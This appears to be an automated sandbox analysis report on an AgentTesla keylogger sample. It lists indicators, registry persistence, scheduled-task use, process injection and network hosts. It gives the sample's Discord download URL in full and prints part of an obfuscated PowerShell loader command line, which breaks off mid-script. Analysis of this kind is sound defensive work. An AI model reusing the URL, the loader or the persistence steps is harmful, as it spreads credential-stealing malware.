agenttesla | hxxps://cdn[.]discordapp[.]com/attachments/1246679036214775850/1246841848383799467/Xerin[.]rar?ex=665ddb75&is=665c89f5&hm=e2648adbc695a1280ed7363d8ed05dcaf4ecff6a1482236197486c52e9a3b99f&

Analysis

max time kernel
60s
max time network
63s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
02-06-2024 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1246679036214775850/1246841848383799467/Xerin.rar?ex=665ddb75&is=665c89f5&hm=e2648adbc695a1280ed7363d8ed05dcaf4ecff6a1482236197486c52e9a3b99f&

Score

10^/10

agenttesla agilenet keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 5692 created 616 5692 powershell.EXE winlogon.exe

description	pid	process	target process
PID 5692 created 616	5692	powershell.EXE	winlogon.exe

AgentTesla payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll	family_agenttesla
behavioral1/memory/5136-187-0x0000000008AC0000-0x0000000008CD4000-memory.dmp	family_agenttesla

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

$77Boy.exeXerinFuscatorFucker.exeXerinJunk.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	$77Boy.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	XerinFuscatorFucker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	XerinJunk.exe

Executes dropped EXE 8 IoCs

Processes:

XerinFuscatorFucker.exeXerinFuscatorFucker.exeXerinJunk.exe$77Boy.exeInstall.exeXerinFuscator.exeXerinFuscator.exe$77Boy.exe

pid	process
2204	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5284	XerinJunk.exe
5564	$77Boy.exe
5628	Install.exe
5696	XerinFuscator.exe
3212	XerinFuscator.exe
5896	$77Boy.exe

Loads dropped DLL 20 IoCs

Processes:

XerinFuscatorFucker.exeXerinFuscator.exeXerinFuscator.exe

pid	process
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe
5696	XerinFuscator.exe
5696	XerinFuscator.exe
5696	XerinFuscator.exe
5696	XerinFuscator.exe
3212	XerinFuscator.exe
3212	XerinFuscator.exe
3212	XerinFuscator.exe
3212	XerinFuscator.exe

Obfuscated with Agile.Net obfuscator 6 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
C:\Users\Admin\Videos\Xerin\XerinFuscator.exe	agile_net
behavioral1/memory/5136-148-0x0000000007C20000-0x00000000080EE000-memory.dmp	agile_net
C:\Users\Admin\AppData\Local\Temp\40585F64.dll	agile_net
behavioral1/memory/5136-996-0x000000000B2A0000-0x000000000B3E2000-memory.dmp	agile_net
behavioral1/memory/5696-1042-0x0000000000890000-0x0000000000D5E000-memory.dmp	agile_net
behavioral1/memory/3212-1066-0x0000000000F20000-0x00000000013EE000-memory.dmp	agile_net

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

$77Boy.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Boy = "C:\\Users\\Admin\\AppData\\Roaming\\$77Boy.exe"	$77Boy.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

44 raw.githubusercontent.com
45 raw.githubusercontent.com
48 raw.githubusercontent.com
49 raw.githubusercontent.com

flow	ioc
44	raw.githubusercontent.com
45	raw.githubusercontent.com
48	raw.githubusercontent.com
49	raw.githubusercontent.com

Drops file in System32 directory 5 IoCs

Processes:

powershell.EXEsvchost.exesvchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$77Boy	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 5692 set thread context of 5936 5692 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5100 schtasks.exe

description	pid	process	target process
PID 5692 set thread context of 5936	5692	powershell.EXE	dllhost.exe

pid	process
5100	schtasks.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeXerinFuscator.exeXerinFuscatorFucker.exeXerinFuscator.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XerinFuscator.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XerinFuscatorFucker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XerinFuscator.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XerinFuscator.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XerinFuscator.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XerinFuscator.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XerinFuscator.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XerinFuscatorFucker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XerinFuscatorFucker.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE

Modifies registry class 2 IoCs

Processes:

msedge.exeExplorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exe$77Boy.exepowershell.EXEdllhost.exeXerinFuscator.exe

pid	process
3360	msedge.exe
3360	msedge.exe
2668	msedge.exe
2668	msedge.exe
4668	identity_helper.exe
4668	identity_helper.exe
820	msedge.exe
820	msedge.exe
5564	$77Boy.exe
5564	$77Boy.exe
5692	powershell.EXE
5692	powershell.EXE
5692	powershell.EXE
5692	powershell.EXE
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5564	$77Boy.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5696	XerinFuscator.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe
5936	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3372 Explorer.EXE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

2668 msedge.exe
2668 msedge.exe
2668 msedge.exe
2668 msedge.exe
2668 msedge.exe
2668 msedge.exe
2668 msedge.exe

pid	process
3372	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zG.exe$77Boy.exeXerinFuscatorFucker.exepowershell.EXEdllhost.exeExplorer.EXEXerinFuscator.exeXerinFuscator.exesvchost.exe

description	pid	process
Token: SeRestorePrivilege	2880	7zG.exe
Token: 35	2880	7zG.exe
Token: SeSecurityPrivilege	2880	7zG.exe
Token: SeSecurityPrivilege	2880	7zG.exe
Token: SeDebugPrivilege	5564	$77Boy.exe
Token: SeDebugPrivilege	5136	XerinFuscatorFucker.exe
Token: SeDebugPrivilege	5692	powershell.EXE
Token: SeDebugPrivilege	5692	powershell.EXE
Token: SeDebugPrivilege	5936	dllhost.exe
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeDebugPrivilege	5696	XerinFuscator.exe
Token: SeDebugPrivilege	3212	XerinFuscator.exe
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeShutdownPrivilege	3372	Explorer.EXE
Token: SeCreatePagefilePrivilege	3372	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2240	svchost.exe
Token: SeIncreaseQuotaPrivilege	2240	svchost.exe
Token: SeSecurityPrivilege	2240	svchost.exe
Token: SeTakeOwnershipPrivilege	2240	svchost.exe
Token: SeLoadDriverPrivilege	2240	svchost.exe
Token: SeSystemtimePrivilege	2240	svchost.exe
Token: SeBackupPrivilege	2240	svchost.exe
Token: SeRestorePrivilege	2240	svchost.exe
Token: SeShutdownPrivilege	2240	svchost.exe
Token: SeSystemEnvironmentPrivilege	2240	svchost.exe
Token: SeUndockPrivilege	2240	svchost.exe
Token: SeManageVolumePrivilege	2240	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2240	svchost.exe

Suspicious use of FindShellTrayWindow 38 IoCs

Processes:

msedge.exe7zG.exeXerinFuscatorFucker.exe

pid	process
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2880	7zG.exe
5136	XerinFuscatorFucker.exe
5136	XerinFuscatorFucker.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe
2668	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

XerinFuscatorFucker.exeExplorer.EXE

pid process

5136 XerinFuscatorFucker.exe
3372 Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2668 wrote to memory of 2180	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 2180	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 4868	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3360	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3360	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe
PID 2668 wrote to memory of 3692	2668	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:388

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5e110e22-97c8-4a1b-ab10-df6d2988fb30}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5936

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1216

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:esaBdpfYPqbR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CKXSsGOlSJFUgj,[Parameter(Position=1)][Type]$cUvJDpXaef)$bFgCcxbHdMc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'em'+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'ele'+'g'+'a'+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](101)+'al'+[Char](101)+'d,'+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+'ut'+[Char](111)+'Cla'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$bFgCcxbHdMc.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'yS'+[Char](105)+''+'g'+''+','+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$CKXSsGOlSJFUgj).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');$bFgCcxbHdMc.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+'i'+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'V'+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$cUvJDpXaef,$CKXSsGOlSJFUgj).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');Write-Output 